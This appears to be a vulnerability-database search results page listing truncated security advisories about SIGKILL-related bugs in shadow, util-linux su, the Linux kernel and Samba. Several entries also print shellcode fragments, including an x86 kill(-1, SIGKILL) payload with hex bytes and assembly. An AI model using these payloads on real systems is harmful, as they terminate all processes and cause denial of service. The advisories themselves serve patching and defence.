82 matches found
Shadow: Multiple vulnerabilities
Background Shadow is a set of tools to deal with user accounts. Description Multiple vulnerabilities have been discovered in Shadow. Please review the CVE identifiers referenced below for details. Impact A local attacker could possibly cause a Denial of Service condition, gain privileges via...
GLSA-201706-02 : Shadow: Multiple vulnerabilities
The remote host is affected by the vulnerability described in GLSA-201706-02 Shadow: Multiple vulnerabilities Multiple vulnerabilities have been discovered in Shadow. Please review the CVE identifiers referenced below for details. Impact : A local attacker could possibly cause a Denial of Service...
USN-3276-1: shadow vulnerabilities
Sebastian Krahmer discovered integer overflows in shadow utilities. A local attacker could possibly cause them to crash or potentially gain privileges via crafted input. CVE-2016-6252 Tobias Stöckmann discovered a race condition in su. A local attacker could cause su to send SIGKILL to other...
Ubuntu 14.04 LTS / 16.04 LTS : shadow vulnerabilities (USN-3276-1)
The remote Ubuntu 14.04 LTS / 16.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-3276-1 advisory. Sebastian Krahmer discovered integer overflows in shadow utilities. A local attacker could possibly cause them to crash or potentially gain...
openSUSE Security Update : util-linux (openSUSE-2017-305)
This update for util-linux fixes the following issues : This security issue was fixed : - CVE-2017-2616: In su with PAM support it was possible for local users to send SIGKILL to selected other processes with root privileges bsc1023041. This non-security issues were fixed : - lscpu: Implement WSL...
MGASA-2017-0072 Updated util-linux packages fix security vulnerability
With the su command from util-linux before 2.29.2, it is possible for any local user to send SIGKILL to other processes with root privileges. To exploit this, the user must be able to perform su with a successful login. SIGKILL can only be sent to processes which were executed after the su proces...
Updated util-linux packages fix security vulnerability
With the su command from util-linux before 2.29.2, it is possible for any local user to send SIGKILL to other processes with root privileges. To exploit this, the user must be able to perform su with a successful login. SIGKILL can only be sent to processes which were executed after the su proces...
openSUSE: Security Advisory for util-linux (openSUSE-SU-2017:0589-1)
The remote host is missing an update for the Copyright C 2017 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...
SUSE SLED12 / SLES12 Security Update : util-linux (SUSE-SU-2017:0555-1)
This update for util-linux fixes the following issues: This security issue was fixed : - CVE-2017-2616: In su with PAM support it was possible for local users to send SIGKILL to selected other processes with root privileges bsc1023041. The update package also includes non-security fixes. See...
linux/x86 kill(-1, SIGKILL) - 10 bytes
// linux/x86 kill-1, SIGKILL - 10 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x25" \ push $0x25 "\x58" \ pop %eax "\x6a\xff" \ push $0xffffffff = -1 "\x5b" \ pop %ebx "\xb1\x09" \ mov $0x9,%cl "\xcd\x80"; \ int $0x80 int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...
linux/x86 kill all processes 9 bytes
No description provided by source. ; linux/x86 kill all processes 9 bytes ; root@thegibson ; 2010-01-14 section .text global start start: ; kill-1, SIGKILL; mov al, 37 push byte -1 pop ebx mov cl, 9 int 0x80...
[oss-security] Re: (Linux kernel) Bug#751417: linux-image-3.2.0-4-5kc-malta: no SIGKILL after prctl(PR_SET_SECCOMP, 1, ...) on MIPS
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 According to the manual page, after calling it with 1 as a second argument, any consecutive system calls other than read, write, exit and sigreturn should result in the delivery of SIGKILL. However, under MIPS any consecutive system call behaves as if...
[oss-security] Re: Bug#751417: linux-image-3.2.0-4-5kc-malta: no SIGKILL after prctl(PR_SET_SECCOMP, 1, ...) on MIPS
On dim., 2014-06-15 at 19:31 +0100, Ben Hutchings wrote: Please can you assign a CVE ID to this bug? Hi Ben, we usually don't assign CVE from our pool for public issues, and I'm especially reluctant here as I don't know if someone else aware of this issue could have assign one. So I'm asking on...
Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2013-2513)
The remote Oracle Linux 5 / 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2013-2513 advisory. - wakeupprocess should be never used to wakeup a TASKSTOPPED/TRACED task Oleg Nesterov Orabug: 16405869 CVE-2013-0871 - ptrace: ensure...
Important: Red Hat Security Advisory: kernel security and bug fix update
Updated kernel packages that fix one security issue and one bug are now available for Red Hat Enterprise Linux 6.1 Extended Update Support. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System CVSS base score, which...
kernel security update
kernel 2.6.18-348.3.1 - utrace ensure archptrace can never race with SIGKILL Oleg Nesterov 912071 912072 CVE-2013-0871 - x86 msr: Add capabilities check Nikola Pajkovsky 908696 908697 CVE-2013-0268...
Samba mtab lock file race condition
Multiple race conditions in the 1 mount.cifs and 2 umount.cifs programs in Samba 3.6 allow local users to cause a denial of service mounting outage via a SIGKILL signal during a time window when the /etc/mtab file exists...
Linux/ARM - setuid0 & kill-1, SIGKILL 28 bytes
Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes. Shellcode exploit for linux platform / Title: Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes Kill all processes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan...
linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
Exploit for linux/x86 platform in category shellcode ==================================================== linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes ==================================================== / Title: Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes Kill all processes Date:...
linux/x86-64 sethostname() & killall 33 bytes shellcode
Exploit for linux/x86-64 platform in category shellcode ======================================================= linux/x86-64 sethostname & killall shellcode 33 bytes ======================================================= Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Autho...